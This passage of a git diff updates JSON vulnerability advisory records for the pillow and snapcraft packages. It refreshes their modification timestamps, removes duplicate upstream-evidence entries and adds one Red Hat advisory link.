"12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-34552.json b/advisories/BREW-pillow-CVE-2021-34552.json index a9e4c9c27f8..37707a25dfd 100644 --- a/advisories/BREW-pillow-CVE-2021-34552.json +++ b/advisories/BREW-pillow-CVE-2021-34552.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-34552", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-34552", "BIT-pillow-2021-34552", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-22815.json b/advisories/BREW-pillow-CVE-2022-22815.json index 974738036e1..463bb9c27b2 100644 --- a/advisories/BREW-pillow-CVE-2022-22815.json +++ b/advisories/BREW-pillow-CVE-2022-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-22815", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-22815", "BIT-pillow-2022-22815", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-22816.json b/advisories/BREW-pillow-CVE-2022-22816.json index 90655ac682e..19792606b38 100644 --- a/advisories/BREW-pillow-CVE-2022-22816.json +++ b/advisories/BREW-pillow-CVE-2022-22816.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-22816", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-22816", "BIT-pillow-2022-22816", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-22817.json b/advisories/BREW-pillow-CVE-2022-22817.json index 2db3ba8b0e3..970ee905bdd 100644 --- a/advisories/BREW-pillow-CVE-2022-22817.json +++ b/advisories/BREW-pillow-CVE-2022-22817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-22817", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-22817", "BIT-pillow-2022-22817", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-24303.json b/advisories/BREW-pillow-CVE-2022-24303.json index 88fe821eda5..6be09d32a5d 100644 --- a/advisories/BREW-pillow-CVE-2022-24303.json +++ b/advisories/BREW-pillow-CVE-2022-24303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-24303", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-24303", "BIT-pillow-2022-24303", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-30595.json b/advisories/BREW-pillow-CVE-2022-30595.json index 94dceb89fb9..fe07e1253f7 100644 --- a/advisories/BREW-pillow-CVE-2022-30595.json +++ b/advisories/BREW-pillow-CVE-2022-30595.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-30595", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-30595", "BIT-pillow-2022-30595", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-45198.json b/advisories/BREW-pillow-CVE-2022-45198.json index 037f7623f94..ed63f3f2ca6 100644 --- a/advisories/BREW-pillow-CVE-2022-45198.json +++ b/advisories/BREW-pillow-CVE-2022-45198.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-45198", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-45198", "BIT-pillow-2022-45198", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-45199.json b/advisories/BREW-pillow-CVE-2022-45199.json index 6d67d5eca9c..1206d6d8ec8 100644 --- a/advisories/BREW-pillow-CVE-2022-45199.json +++ b/advisories/BREW-pillow-CVE-2022-45199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-45199", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-45199", "BIT-pillow-2022-45199", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2023-44271.json b/advisories/BREW-pillow-CVE-2023-44271.json index 56d77deed2d..0fbab1f2ae6 100644 --- a/advisories/BREW-pillow-CVE-2023-44271.json +++ b/advisories/BREW-pillow-CVE-2023-44271.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2023-44271", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2023-44271", "BIT-pillow-2023-44271", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2023-4863.json b/advisories/BREW-pillow-CVE-2023-4863.json index df1092dbae9..08251c9836c 100644 --- a/advisories/BREW-pillow-CVE-2023-4863.json +++ b/advisories/BREW-pillow-CVE-2023-4863.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2023-4863", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-j7hp-h8jx-5ppr", "A-299477569", @@ -45,13 +45,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2023-50447.json b/advisories/BREW-pillow-CVE-2023-50447.json index 63e2f7f93b7..90129f6e678 100644 --- a/advisories/BREW-pillow-CVE-2023-50447.json +++ b/advisories/BREW-pillow-CVE-2023-50447.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2023-50447", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2023-50447", "BIT-pillow-2023-50447", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2024-28219.json b/advisories/BREW-pillow-CVE-2024-28219.json index 52cfc30dafe..4f1ba23f925 100644 --- a/advisories/BREW-pillow-CVE-2024-28219.json +++ b/advisories/BREW-pillow-CVE-2024-28219.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2024-28219", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2024-28219", "BIT-pillow-2024-28219", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2025-48379.json b/advisories/BREW-pillow-CVE-2025-48379.json index 50b8898f8fe..aaeaa416532 100644 --- a/advisories/BREW-pillow-CVE-2025-48379.json +++ b/advisories/BREW-pillow-CVE-2025-48379.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2025-48379", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2025-48379", "BIT-pillow-2025-48379", @@ -48,20 +48,6 @@ "subject_version": "12.3.0", "key": "https://github.com/python-pillow/pillow" }, - { - "strategy": "git", - "ecosystem": "GIT", - "name": "https://github.com/python-pillow/pillow", - "subject_version": "12.3.0", - "key": "https://github.com/python-pillow/pillow" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2026-25990.json b/advisories/BREW-pillow-CVE-2026-25990.json index 31a30bf3d47..cb32482e972 100644 --- a/advisories/BREW-pillow-CVE-2026-25990.json +++ b/advisories/BREW-pillow-CVE-2026-25990.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-25990", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-25990", "BIT-pillow-2026-25990", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-40192.json b/advisories/BREW-pillow-CVE-2026-40192.json index a9dd710c9a5..bbd36778c1b 100644 --- a/advisories/BREW-pillow-CVE-2026-40192.json +++ b/advisories/BREW-pillow-CVE-2026-40192.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-40192", "published": "2026-08-13T17:28:20Z", - "modified": "2026-09-02T09:39:33Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-40192", "BIT-pillow-2026-40192", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", @@ -215,6 +208,10 @@ "type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2026:61629" }, + { + "type": "ADVISORY", + "url": "https://access.redhat.com/errata/RHSA-2026:65126" + }, { "type": "ADVISORY", "url": "https://access.redhat.com/security/cve/CVE-2026-40192" diff --git a/advisories/BREW-pillow-CVE-2026-42308.json b/advisories/BREW-pillow-CVE-2026-42308.json index 8003803d73e..eaf93f46e40 100644 --- a/advisories/BREW-pillow-CVE-2026-42308.json +++ b/advisories/BREW-pillow-CVE-2026-42308.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42308", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42308", "BIT-pillow-2026-42308", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-42309.json b/advisories/BREW-pillow-CVE-2026-42309.json index a7f69bf6611..24294863d3c 100644 --- a/advisories/BREW-pillow-CVE-2026-42309.json +++ b/advisories/BREW-pillow-CVE-2026-42309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42309", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42309", "BIT-pillow-2026-42309", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-42310.json b/advisories/BREW-pillow-CVE-2026-42310.json index e0dadc86919..621d6c7b7f2 100644 --- a/advisories/BREW-pillow-CVE-2026-42310.json +++ b/advisories/BREW-pillow-CVE-2026-42310.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42310", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42310", "BIT-pillow-2026-42310", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-42311.json b/advisories/BREW-pillow-CVE-2026-42311.json index 242433b0cde..e5f6930311b 100644 --- a/advisories/BREW-pillow-CVE-2026-42311.json +++ b/advisories/BREW-pillow-CVE-2026-42311.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42311", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42311", "BIT-pillow-2026-42311", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-54058.json b/advisories/BREW-pillow-CVE-2026-54058.json index d427237b8a0..ea5884f328b 100644 --- a/advisories/BREW-pillow-CVE-2026-54058.json +++ b/advisories/BREW-pillow-CVE-2026-54058.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-54058", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-54058", "BIT-pillow-2026-54058", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-54059.json b/advisories/BREW-pillow-CVE-2026-54059.json index 453eb25e747..15243cb7f5c 100644 --- a/advisories/BREW-pillow-CVE-2026-54059.json +++ b/advisories/BREW-pillow-CVE-2026-54059.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-54059", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-54059", "BIT-pillow-2026-54059", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-54060.json b/advisories/BREW-pillow-CVE-2026-54060.json index 9622c6e070a..2dce72229f9 100644 --- a/advisories/BREW-pillow-CVE-2026-54060.json +++ b/advisories/BREW-pillow-CVE-2026-54060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-54060", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-54060", "BIT-pillow-2026-54060", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-55379.json b/advisories/BREW-pillow-CVE-2026-55379.json index 8af9949a19a..c20de4a1a29 100644 --- a/advisories/BREW-pillow-CVE-2026-55379.json +++ b/advisories/BREW-pillow-CVE-2026-55379.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-55379", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-55379", "BIT-pillow-2026-55379", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-55380.json b/advisories/BREW-pillow-CVE-2026-55380.json index 9e503c3eee7..1fa7fddd6f7 100644 --- a/advisories/BREW-pillow-CVE-2026-55380.json +++ b/advisories/BREW-pillow-CVE-2026-55380.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-55380", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-55380", "BIT-pillow-2026-55380", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-55798.json b/advisories/BREW-pillow-CVE-2026-55798.json index 0f1ae9de2b2..c6b7634f461 100644 --- a/advisories/BREW-pillow-CVE-2026-55798.json +++ b/advisories/BREW-pillow-CVE-2026-55798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-55798", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-55798", "BIT-pillow-2026-55798", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Ubuntu", diff --git a/advisories/BREW-pillow-CVE-2026-59197.json b/advisories/BREW-pillow-CVE-2026-59197.json index 6f375b5e385..2b463e22e89 100644 --- a/advisories/BREW-pillow-CVE-2026-59197.json +++ b/advisories/BREW-pillow-CVE-2026-59197.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59197", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59197", "BIT-pillow-2026-59197", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59198.json b/advisories/BREW-pillow-CVE-2026-59198.json index ae76276ce11..b5013029605 100644 --- a/advisories/BREW-pillow-CVE-2026-59198.json +++ b/advisories/BREW-pillow-CVE-2026-59198.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59198", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59198", "BIT-pillow-2026-59198", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59199.json b/advisories/BREW-pillow-CVE-2026-59199.json index c839d43d441..42e3b879fa8 100644 --- a/advisories/BREW-pillow-CVE-2026-59199.json +++ b/advisories/BREW-pillow-CVE-2026-59199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59199", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59199", "BIT-pillow-2026-59199", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59200.json b/advisories/BREW-pillow-CVE-2026-59200.json index c51ea8d5f11..2e3b9c0acbb 100644 --- a/advisories/BREW-pillow-CVE-2026-59200.json +++ b/advisories/BREW-pillow-CVE-2026-59200.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59200", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59200", "BIT-pillow-2026-59200", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59203.json b/advisories/BREW-pillow-CVE-2026-59203.json index 48b9997fa24..5e49f9b6f3f 100644 --- a/advisories/BREW-pillow-CVE-2026-59203.json +++ b/advisories/BREW-pillow-CVE-2026-59203.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59203", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59203", "BIT-pillow-2026-59203", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59204.json b/advisories/BREW-pillow-CVE-2026-59204.json index 42d42526d90..1112cb6fe57 100644 --- a/advisories/BREW-pillow-CVE-2026-59204.json +++ b/advisories/BREW-pillow-CVE-2026-59204.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59204", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59204", "BIT-pillow-2026-59204", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59205.json b/advisories/BREW-pillow-CVE-2026-59205.json index 5da66571ff0..082ab3af386 100644 --- a/advisories/BREW-pillow-CVE-2026-59205.json +++ b/advisories/BREW-pillow-CVE-2026-59205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59205", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59205", "BIT-pillow-2026-59205", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-snapcraft-CVE-2009-5042.json b/advisories/BREW-snapcraft-CVE-2009-5042.json index c6e599b275a..97384dfcfe8 100644 --- a/advisories/BREW-snapcraft-CVE-2009-5042.json +++ b/advisories/BREW-snapcraft-CVE-2009-5042.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2009-5042", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cg75-6938-wx58", "CVE-2009-5042", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "docutils", - "subject_version": "0.23", - "key": "pkg:pypi/docutils@0.23", - "resource": "docutils" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2012-4571.json b/advisories/BREW-snapcraft-CVE-2012-4571.json index 9f51ec0d8ac..f80fe0bde06 100644 --- a/advisories/BREW-snapcraft-CVE-2012-4571.json +++ b/advisories/BREW-snapcraft-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2012-4571", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2012-5577.json b/advisories/BREW-snapcraft-CVE-2012-5577.json index 745b3daf9dc..7bbd1ce9006 100644 --- a/advisories/BREW-snapcraft-CVE-2012-5577.json +++ b/advisories/BREW-snapcraft-CVE-2012-5577.json 